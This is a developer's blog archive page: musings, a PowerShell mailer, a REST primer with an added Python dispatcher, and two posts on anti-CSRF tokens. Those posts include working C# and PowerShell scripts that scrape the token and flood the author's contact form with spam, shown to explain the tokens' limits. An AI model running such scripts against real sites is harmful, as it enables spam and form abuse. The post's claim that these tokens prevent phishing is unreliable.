Preaching to the Choir

February 1st, 2010

I go for a walk every day (yeah-yeah, I’ll be a mall walker one day). My route takes me by a series of automated parking payment machines - the ones where you punch in your license plate along with a parking quadrant. Surprisingly enough, these machines provide endless comedic relief as people talk to, grumble at, and curse these inanimate objects - some people go as far as to physically assault them, jam their keys in them, give ‘em a good kick. It’s funny to watch a level-headed businessman break his cool as he uses a car key to fish around in the coin slot while having a few words with a machine. My favorite responses are the talkers, grumbling about the price of parking and technology in general. I’m sure they know the machine can’t hear them, yet they climb on the soapbox and give the box of wires a piece of their mind.

Author: Adam Kahtava Categories: Musings Tags:

Algorithm Analysis and Asymptotic Complexity / Big O Notation Is Important

January 21st, 2010

Algorithm Analysis (Asymptotic Complexity / Big O Notation) courses are the bane of computer science students everywhere. These courses were mandatory, dry, and lacked real-world pragmatism for students who just wanted to get stuff done. Well, that’s what we told ourselves; that’s the theory we presented to our friends - we were convinced that framework vendors or the hoogie-boogie man would figure out the most efficient way to performance tune / compile our code. We looked to Sun, Microsoft, or IBM to figure out the details. In truth we were lazy, naive students and Algorithm Analysis was tougher than we’d like to admit - much harder than programming in 4th generation programming languages, more difficult than computer theory or operating system theory.

As I brush up on Algorithm Analysis, I find these perspectives interesting:

to be a good programmer, you just program every day for two years … to be a world-class programmer, you can program every day for ten years, or you can program every day for two years and take an algorithms class - Introduction - Analysis of Algorithms, Insertion Sort, Mergesort

Having a solid base of algorithmic knowledge and technique is one characteristic that separates the truly skilled programmers from the novices. With modern computing technology, you can accomplish some tasks without knowing much about algorithms, but with a good background in algorithms, you can do much, much more - Introduction to Algorithms, Second Edition

It’s unfortunate that our professors never mentioned that Algorithm Analysis would be an integral part of academic type interviews and a prerequisite for getting a job at Google, but then again who would have listened?

Author: Adam Kahtava Categories: Musings Tags:

Sending Email With Attachments In PowerShell

January 19th, 2010

Here’s an example of how to send email with attachments via PowerShell:

# A Mailer script that makes use of System.Net.Mail to send email with attachments
#
# Sample usage:
#  PS> Send-Mail-With-Attachment 'email@domain.com' 'Hello world!' 'Filename.txt'

function global:Send-Mail-With-Attachment($to, $subject, $file){

  # resolve the attachment relative to the current directory
  $filenameAndPath = (Resolve-Path .\$file).ToString()

  # MailMessage parses the sender as a mail address, so a bare display name is rejected;
  # use the "Display Name <address>" form (mailer@domain.com is a placeholder)
  $from = 'Automated Powershell Mailer <mailer@domain.com>'

  # System.Net.Mail lives in System.dll, which PowerShell has already loaded,
  # so no assembly needs to be loaded by hand

  # the message body is the subject text; add a $body parameter if you need more
  $message = New-Object System.Net.Mail.MailMessage($from, $to, $subject, $subject)
  $attachment = New-Object System.Net.Mail.Attachment($filenameAndPath, 'text/plain')
  $message.Attachments.Add($attachment)

  # point the client at your SMTP relay
  $smtpClient = New-Object System.Net.Mail.SmtpClient
  $smtpClient.Host = 'mail.domain.com'
  $smtpClient.Send($message)

  # release the file handle held by the attachment
  $message.Dispose()
}

Contribute, view, or download the script here: Mailer.ps1

Author: Adam Kahtava Categories: .NET, PowerShell Tags:

Life’s Creative Circle: Creativity Isn’t About Art or Design

January 14th, 2010

The most popular conception of creativity is that it’s something to do with the arts.

Nonsense. - Paul Arden, It’s Not How Good You Are, It’s How Good You Want To Be.

This year marks a new decade for me (I’m saying goodbye to the late 20’s). According to Arden’s Creative Circle this blog was written during my era of Maturity and for the next 10 years I’ll be Hell Bent On Success. Thanks for putting up with my growing pains and griping.

Author: Adam Kahtava Categories: Creativity, Musings, Personal Tags:

Finding Work That You Love

December 31st, 2009

As a youngster I was encouraged to: “Find work that you love and do what makes you happy.” Ironically, this sage advice was usually delivered by the unhappy, unemployed, or paranoid (paranoid that the government was stealing their money, unhappy with the uncertainty of not working, or unemployed because keeping work in small remote economies is tough). It’s also fair to mention that this piece of advice was usually followed by: “Get a trade. You need a trade!” This was probably great advice a couple decades ago, or if you’re working in remote communities, but less relevant in today’s world. I loosely followed this advice through my younger years and I remember constantly being frustrated when work inevitably lost its fun. Thankfully, I eventually realized that work is work (if work was fun we’d just call it fun, then we’d be preoccupied with having work, not fun). Anyhow, I sympathize with today’s youngsters who are wrestling with this same conundrum - being told one thing, but experiencing a different reality in the real world. My words of advice today would be to: “get experience, work, do whatever you can, build a resume, go to school, and you’ll eventually find work that you love. Oh, and don’t look solely to work for happiness.”

Today I do find my work fun, but I couldn’t have got here without the experience I gained while plowing through boring jobs (like working the assembly line, tree planting, or digging outhouse pits). In order to find the job you love you need to start gaining experience now.

Author: Adam Kahtava Categories: Musings, Personal Tags:

Hacking Anti Cross-site Request Forgery Tokens (CSRF) With Powershell

December 16th, 2009

I ported the example of how to hack an Anti CSRF Token protected form - previously shown in my post What Are Anti Cross-site Request Forgery Tokens And What Are They Good For? - to PowerShell.

How to hack an Anti CSRF Token from PowerShell

function global:spam-adamdotcom(){

  # Load the assembly containing WebClientWithCookies and RegexUtilities
  [Reflection.Assembly]::LoadFile((Resolve-Path "AdamDotCom.Common.Service.dll")) | out-null

  # create a new instance of the HTTP Web Client that supports cookies
  $webClient = New-Object AdamDotCom.Common.Service.Utilities.WebClientWithCookies

  # download the page that contains the Anti CRSF Token
  [void] $webClient.DownloadData("http://adam.kahtava.com/contact");

  # use a regular expression to grab the Anti CRSF Token
  #  - this is an MVC site so we're looking for a token named "RequestVerificationToken"
  $regexMatch = (New-Object Regex("RequestVerificationToken=(?<CRSF_Token>[^;]+)")).Match($webClient.ResponseHeaders["Set-Cookie"])

  # parse out the Anti CRSF Token
  $antiCrsfToken = [AdamDotCom.Common.Service.Utilities.RegexUtilities]::GetTokenString($regexMatch, "CRSF_Token")

  write-host "`nYour Anti CRSF Token is: " $antiCrsfToken

  # construct the message including the Anti CSRF Token
  $message = "__RequestVerificationToken=" + [System.Web.HttpUtility]::UrlEncode($antiCrsfToken) +
             "&fromName=Johnathon Fink" +
             "&fromAddress=prancesw@rmcres.com" +
             "&subject=Call for your diploma now" +
             "&body=Is your lack of a degree..."

  # send spam-spam-spam
  $webClient.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
  [void] $webClient.UploadData("http://adam.kahtava.com/contact/send", "POST",
                              ([System.Text.Encoding]::UTF8.GetBytes($message)));

  write-host "`nSuccess!!! Your spam has been sent.`n"
}

To run this script:

  1. Download the script
  2. Run PowerShell
  3. Load the script: PS > .\Automated-AntiCSRF-Authentication-Script.ps1
  4. Start sending spam-spam-spam: PS > spam-adamdotcom

Here’s the output as seen on my machine:

PS C:\> spam-adamdotcom

Your Anti CRSF Token is:  f54ZlHS3L1Xyl65dYd1uYYh90ygNKYmCswXJUnr0GYtgcrJdJILsQ2jyFotzc10L

Success!!! Your spam has been sent.

This example uses a derivative of the .NET Framework’s WebClient class with cookies enabled, so it depends on the AdamDotCom.Common.Service.dll assembly (browse the source here). This dependency can be resolved automatically by running the download-client function that’s also found within the PowerShell script.

Contribute, view, or download the openly available script here: Automated-AntiCSRF-Authentication-Script.ps1

Author: Adam Kahtava Categories: .NET, ASP.NET MVC, PowerShell Tags:

RESTful Web Services: What Are They?

December 4th, 2009

RESTful web services are all the rage these days, and for good reason. Many web based MVC frameworks depend on REST. Here’s a crash course on what RESTful web services are and aren’t.

REST stands for Representational State Transfer. REST is not an architecture; instead it’s a set of design criteria. RESTfulness and RESTful web services try to make use of the full gamut of HTTP methods (GET, PUT, POST, DELETE, OPTIONS, and HEAD), and try to expose every resource or operation as a meaningful URI / URL. RESTful web services are intuitive, and work similarly to the way the human web works (meaningful semantic data is returned to the client, resources link to other resources, microformats are employed, and so on).

Qualities associated with RESTfulness:

  • RESTful is the way the human web works - the data returned by services can be easily understood by humans (or robots) and usually contains links to other resources
  • RESTful web services use varying response formats. Common formats include: XHTML pages, XHTML microformats, JSON, XML, ad-hoc HTML, JavaScript, or build your own
  • RESTful web services depend on meaningful URIs. These URIs can contain scoping information, but shouldn’t contain query requests. For example: when searching for ‘kumquat’ on Google you’re redirected to http://www.google.com/search?q=kumquat, where your search query is present as a query variable. A URI like http://www.google.com/search/kumquat/ would instead encode the search parameters in the path itself - this is not recommended because a path implies a predictable, addressable resource, and search results are unpredictable
  • RESTful web services also use query variables as inputs to algorithms
  • RESTful web services expose a URI for every piece of data the client may want to operate on
  • RESTful web services make use of HTTP methods (GET, PUT, POST, DELETE, OPTIONS, and HEAD)
  • RESTful web services don’t keep the state on the server (that’s the client’s job), they don’t like cookies, and don’t like sessions
  • RESTful web services make use of HTTP Headers

Examples of RESTful web services:

Qualities that are not RESTful:

  • Most SOAP or other RPC-Style Architectures where XML messages are placed in the HTTP Body
  • Frameworks that depend heavily on overloaded POSTs and XML (See Safety, Idempotence, and the Resource-Oriented Architecture for more information)
  • Most big corporate web service frameworks are not RESTful. Some frameworks like WCF try to provide REST like functionality on top of a SOAP based API, but these add-ons can be obtuse and unRESTful.
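As an added example (not code from the original post), here is a small Python dispatcher that exercises the qualities listed above: every piece of data gets its own URI, each URI advertises only the HTTP methods that make sense for it, GET and HEAD are safe, PUT and DELETE are idempotent, representations link to related resources, and no session or cookie is kept on the server. The resource space /notes and /notes/{id}, the class NotesService and the in-memory store are constructed for the illustration.

```python
import json
from typing import Dict, Optional, Tuple

# (status, headers, body); body is None for responses that carry no entity
Response = Tuple[int, Dict[str, str], Optional[str]]


class NotesService:
    """Resource-oriented dispatcher for the constructed URI space /notes and /notes/{id}.

    Resource state (the notes themselves) lives on the server; client state does not:
    there is no session and no cookie, so every request carries everything it needs.
    """

    def __init__(self) -> None:
        self.notes: Dict[str, str] = {}
        self.next_id = 1

    def handle(self, method: str, path: str, body: Optional[str] = None) -> Response:
        parts = [p for p in path.split("/") if p]
        if not parts or parts[0] != "notes" or len(parts) > 2:
            return 404, {}, None
        note_id = parts[1] if len(parts) == 2 else None

        # Each URI advertises exactly the methods that are meaningful for it.
        allowed = ["GET", "HEAD", "OPTIONS"] + (["PUT", "DELETE"] if note_id else ["POST"])
        if method not in allowed:
            return 405, {"Allow": ", ".join(allowed)}, None
        if method == "OPTIONS":
            return 204, {"Allow": ", ".join(allowed)}, None

        if note_id is None:                        # the collection resource /notes
            if method == "POST":                   # POST creates a new subordinate resource
                new_id = str(self.next_id)
                self.next_id += 1
                self.notes[new_id] = body or ""
                return 201, {"Location": f"/notes/{new_id}"}, None
            # The listing links to every note instead of embedding out-of-band ids.
            listing = {"notes": [{"href": f"/notes/{i}"} for i in sorted(self.notes)]}
            return self._entity(method, json.dumps(listing))

        if method == "PUT":                        # idempotent: repeating it yields the same state
            created = note_id not in self.notes
            self.notes[note_id] = body or ""
            if created:
                return 201, {"Location": f"/notes/{note_id}"}, None
            return 204, {}, None
        if note_id not in self.notes:
            return 404, {}, None
        if method == "DELETE":                     # idempotent as well: a second DELETE is a 404
            del self.notes[note_id]
            return 204, {}, None
        # GET and HEAD are safe: they never change resource state. The representation
        # links back to the collection so a client can navigate without prior knowledge.
        rep = json.dumps({"id": note_id, "text": self.notes[note_id],
                          "collection": {"href": "/notes"}})
        return self._entity(method, rep)

    @staticmethod
    def _entity(method: str, rep: str) -> Response:
        headers = {"Content-Type": "application/json", "Content-Length": str(len(rep))}
        # HEAD returns the same headers as GET but no body
        return 200, headers, (rep if method == "GET" else None)


if __name__ == "__main__":
    svc = NotesService()
    print(svc.handle("POST", "/notes", "buy kumquats"))   # 201 with Location: /notes/1
    print(svc.handle("GET", "/notes/1"))                  # 200 with a JSON representation
    print(svc.handle("POST", "/notes/1"))                 # 405 with an Allow header
```

The contrast with the overloaded-POST style is the 405 branch: an RPC-style endpoint would accept any operation through POST with the verb buried in an XML body, whereas here the method, the URI and the status code together say what happened.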

Examples of unRESTful web services:

The growing popularity of web based MVC frameworks is providing a welcome push towards RESTfulness and the simplicity that it brings, because working with the grain of the web (REST) makes life simpler and more semantically meaningful too. If you want to learn more about RESTful web services then check out RESTful Web Services by Leonard Richardson and Sam Ruby.

Author: Adam Kahtava Categories: ASP.NET MVC, RESTful, Services, WCF Tags:

Ramblings From Another Generation X / Y / Millennial

December 1st, 2009

Like a straight ‘A’ student you’ll find me upfront and center, pencil in hand, when someone describes the traits of my demographic group. I fall somewhere in the Generation XY / Millennial demographic group (the boundary varies widely depending on what source you cite). I mean let’s face it, who doesn’t like to read about how our droogs are perceived? Wait a … this could be another manifestation of Generation X / Y / Millennial narcissism others have been writing about. Crap!

When hearing about the traits of our demographic group, I question how unique the traits associated with our group are. It seems that these traits could be common knowledge to smart people everywhere (regardless of demographic segmentation), but then again, this could be my squeaky Generation X / Y / Millennial voice discounting the other demographics (yet again).

I thought Andy Hunt had an accurate description for our demographic:

[Generation Xers are] free agents, with an inherent distrust of institutions … Fiercely individualistic, and perhaps a bit on the dark side, they’ll just quit and move on if there’s a problem at work. They resist being labeled at all costs … They are quite pragmatic, working for a positive outcome regardless of any particular ideology or approach. - Pragmatic Thinking and Learning: Refactor Your Wetware

I’d agree, an inherent distrust of institutions is a common trait in our demographic. It could be that we’re immature and this tendency could wane as we grow older, or it could be a permanent scar stemming from our observations - many of us watched our elders (some with perceived jobs-for-life) jaded and unemployed in the 80’s, then living through the uncertainty that prevailed in the following years.

Others have mentioned that we:

would prefer to work for companies that give them opportunities to contribute their talents to nonprofit organizations. - Volunteering as a Benefit

But then again, who wouldn’t like to work for a company that encouraged contributions to nonprofits and pet projects?

Yet others have noted that we:

demand to be communicated to in a direct, honest and transparent way … are “immediate driven” and quite keen to live their lives right now, rather than adhering to the old Protestant work ethic that suggests you can only reap the rewards of life after you have worked hard and basically sold your soul to your employer. - How to turn on Generation Y

Yup, that sounds fair. We expect transparency in the age of information. Continuing with that thought, it’s also been said that:

[we] view time as a currency … not to be wasted … They want to get the job done, then put it behind them and enjoy life. - Retaining youth

Again, seems a bit obvious. We’re not lazy, but we’ve seen our elders do a lot of weird stuff as they go through their midlife crisis - maybe if they didn’t put off living in the name of work they would have maintained more sanity.

It’s also been said that we:

prefer to dress as casual as possible and work with mobile gadgets or laptops in comfortable, creative spaces. - CareerNews: Tuesday, May 22, 2007

What demographic group doesn’t like to be comfortable while working? Our attire should be an extension of workplace ergonomics - we’re told to lift heavy objects with our legs (not our backs), and to use ergonomically correct equipment. Wearing comfortable clothes and using gadgets should be a natural extension. :)

In general, I think our generation strives to work smarter (not necessarily longer hours), we try to attain a healthy work-life balance, and a number of us value experiences over owning stuff. I think smart people from other demographics have been doing the same things for years, but what do I know, I’m just another Generation X / Y / Millennial.

Author: Adam Kahtava Categories: Musings Tags:

Chatting With a Flash Developer Turned Web Developer

November 30th, 2009

I was chatting with a Flash Developer turned Web Developer. When asked why he made the transition, he predicted that HTML 5 and the evolution of the web thereafter would lessen the demand for Flash Developers (possibly making them obsolete) and that moving towards a Web Developer / Generalist role is an investment for the future. I thought that was an interesting perspective. It’s not far-fetched to predict that the open web will replace proprietary browser plug-ins - in many cases digital content has already replaced print.

Author: Adam Kahtava Categories: Musings, Software Tags:

What Are Anti Cross-site Request Forgery Tokens And What Are They Good For?

November 25th, 2009

Anti Cross-site Request Forgery Tokens help prevent Cross-site Request Forgery (CSRF), also known as XSRF - pronounced “sea-surf” - and are usually implemented through a hidden HTML form element that contains a unique ID. This ID is passed along with subsequent requests for data and validated on the server. Anti CSRF Tokens try to ensure the identity of the user. They aren’t a replacement for CAPTCHAs and don’t prevent robots or web scrapers from manipulating your site - as you’ll soon see.

Why use an Anti CSRF Token?

An overly simple example: If I didn’t use an Anti Forgery Token on my contact page (see the source code: View or Controller), a Spammer could POST data directly against my contact form and potentially drown me with spam.

Here’s a hypothetical form created by an evil Spammer. This form is hosted on http://spammer.com (not my site):

<form action="http://adam.kahtava.com/contact/send" method="POST">
  <input name="fromName" type="text" value="Johnathon Fink" />
  <input name="fromAddress" type="text" value="prancesw@rmcres.com" />
  <input name="subject" type="text" value="Call for your diploma now" />
  <textarea name="body">Is your lack of a degree...</textarea>
  ...
</form>

Again, note that the form action contains a reference to my site (even though it is hosted on another site).

Now, imagine this was a form prompting a user for their username and password. These credentials could be maliciously stored while the user successfully authenticates and is then redirected to the site they thought they were visiting - the way phishing usually works.

After adding an Anti CSRF Token to my contact form, a Spammer can’t access my form remotely (at least not without the token). My contact form with its Anti CSRF Token:

<form action="/contact/send" method="post" name="contact">
  <input name="__RequestVerificationToken" type="hidden" value="0sAqY1ZKb+Qia4..." />
  <input name="fromName" ...

Note the presence of the RequestVerificationToken.

Said Spammer can’t abuse my form without including the unique token. Technically speaking, the Spammer can still abuse my form, but he now needs to:

This is pretty easy to do if you have an implementation of an HTTP Client library that supports cookies.

How to hack an Anti CSRF Token protected form

Using an extended instance of .NET’s WebClient, here’s how our Spammer could circumvent my Anti CSRF Token.

The Spamming script by that wascaly Spammer:

// namespaces used by the snippet below
using System.Net;
using System.Text;
using System.Text.RegularExpressions;

// create a new HTTP Web Client that supports cookies
var webClient = new WebClientWithCookies();

//download my contact page containing the Anti CRSF Token
// (DownloadData returns the page bytes; what matters here is the cookie jar inside webClient)
webClient.DownloadData("http://adam.kahtava.com/contact");

//parse out the Anti CRSF Token
var antiCrsfToken = RegexUtilities.GetTokenString(
                      new Regex("__RequestVerificationToken=(?<CRSF_Token>[^;]+)")
                      .Match(webClient.ResponseHeaders["Set-Cookie"]), "CRSF_Token");

//now the Spammer can drown me in spam-spam-spam
// by scraping my Anti CRSF Token and posting it into my form
webClient.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
byte[] response = webClient.UploadData("http://adam.kahtava.com/contact/send", "POST",
                            Encoding.UTF8.GetBytes(
                              "__RequestVerificationToken=" + antiCrsfToken +
                              "&fromName=\"Johnathon Fink\"" +
                              "&fromAddress=\"prancesw@rmcres.com\"" +
                              "&subject=\"Call for your diploma now\"" +
                              "&body=\"Is your lack of a degree...\""));

The Spammer is back at their old tricks sending me more Spam. ARGH!

What’s the use of an Anti CSRF Token?

Anti CSRF Tokens help prevent phishing attacks. They aren’t meant to prevent spammers or Dr Robotnik and his robots (or web scrapers) from running automated scripts against your web application. Keep in mind that if your site suffers from other XSS vulnerabilities (where the privacy of your cookies or sessions is compromised) then Anti CSRF Tokens don’t work at all.

Read more about how Anti CSRF Tokens work here: Prevent Cross-Site Request Forgery (CSRF) using ASP.NET MVC’s AntiForgeryToken() helper or learn more about Cross-Site Request Forgery at: The Cross-Site Request Forgery (CSRF/XSRF) FAQ.
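The server side of this post, as an added example that is not the post’s code and not ASP.NET MVC’s actual implementation: a Python model of the cookie-plus-hidden-field check, run against the three situations discussed here and in Hacking Anti Cross-site Request Forgery Tokens (CSRF) With Powershell above. The cookie and field name __RequestVerificationToken is the one shown in the contact form; SERVER_KEY, issue_tokens, validate_post and the scenario functions are assumed names, and the token values and spam fields are constructed.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Tuple

# Constructed server-side secret (assumption); in a deployment it is generated once and kept private.
SERVER_KEY = secrets.token_bytes(32)
# The cookie and hidden-field name used by the ASP.NET MVC helper shown in the post.
COOKIE_NAME = "__RequestVerificationToken"


def issue_tokens() -> Tuple[str, str]:
    """Called when the contact form is rendered.

    Returns (cookie_token, form_token): the cookie token is a fresh random value set on
    the browser, the form token is an HMAC of it under the server key and is written into
    the hidden <input>. Only a client that received that cookie also received a matching
    form token, so a form hosted elsewhere cannot supply one for somebody else's session.
    """
    cookie_token = secrets.token_urlsafe(32)
    form_token = hmac.new(SERVER_KEY, cookie_token.encode(), hashlib.sha256).hexdigest()
    return cookie_token, form_token


def validate_post(cookies: Dict[str, str], form: Dict[str, str]) -> Tuple[int, str]:
    """Runs before /contact/send is processed. Returns (HTTP status, reason)."""
    cookie_token = cookies.get(COOKIE_NAME)
    form_token = form.get(COOKIE_NAME)
    if cookie_token is None or form_token is None:
        return 403, "missing anti-forgery cookie or form field"
    expected = hmac.new(SERVER_KEY, cookie_token.encode(), hashlib.sha256).hexdigest()
    # constant-time comparison so the check leaks nothing about the expected value
    if not hmac.compare_digest(expected.encode(), form_token.encode()):
        return 403, "form token does not match the cookie"
    return 200, "accepted"


# Constructed spam fields taken from the post's example form.
SPAM_FIELDS = {"fromName": "Johnathon Fink", "subject": "Call for your diploma now"}


def scenario_cross_site_form() -> Tuple[int, str]:
    """The form on spammer.com submits to /contact/send from the victim's browser.

    The browser attaches the victim's cookie automatically, but the foreign page cannot
    read that cookie or derive a matching hidden-field value, so the request is refused.
    """
    victim_cookie, _ = issue_tokens()          # the victim visited the contact page earlier
    return validate_post({COOKIE_NAME: victim_cookie}, dict(SPAM_FIELDS))


def scenario_foreign_token() -> Tuple[int, str]:
    """Same cross-site form, but it ships a form token from the spammer's own session.

    The token is valid for the spammer's cookie, not the victim's, so it is still refused.
    """
    victim_cookie, _ = issue_tokens()
    _, spammer_form_token = issue_tokens()
    return validate_post({COOKIE_NAME: victim_cookie},
                         {**SPAM_FIELDS, COOKIE_NAME: spammer_form_token})


def scenario_scraper_with_cookie_jar() -> Tuple[int, str]:
    """The WebClientWithCookies flow from the posts.

    The script fetches the form in its own session, keeps the cookie, reads the hidden
    field, and posts both. Nothing is forged across sessions, so the check passes:
    the token proves the request came from a session that saw the form, not that a
    human filled it in.
    """
    cookie_token, form_token = issue_tokens()
    return validate_post({COOKIE_NAME: cookie_token}, {**SPAM_FIELDS, COOKIE_NAME: form_token})


if __name__ == "__main__":
    print("cross-site form     :", scenario_cross_site_form())
    print("foreign token       :", scenario_foreign_token())
    print("scraper, own cookies:", scenario_scraper_with_cookie_jar())
```

The first two scenarios are the attack the token is designed for and both fail; the third is the scraper from the posts and it succeeds, which is why the text says tokens are no substitute for CAPTCHAs or rate limiting. It also shows why XSS defeats the scheme: a script running inside the victim's page can read both the hidden field and the page itself, and submits with the victim's cookie, so the server sees exactly the matching pair it expects.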

Author: Adam Kahtava Categories: .NET, ASP.NET MVC Tags: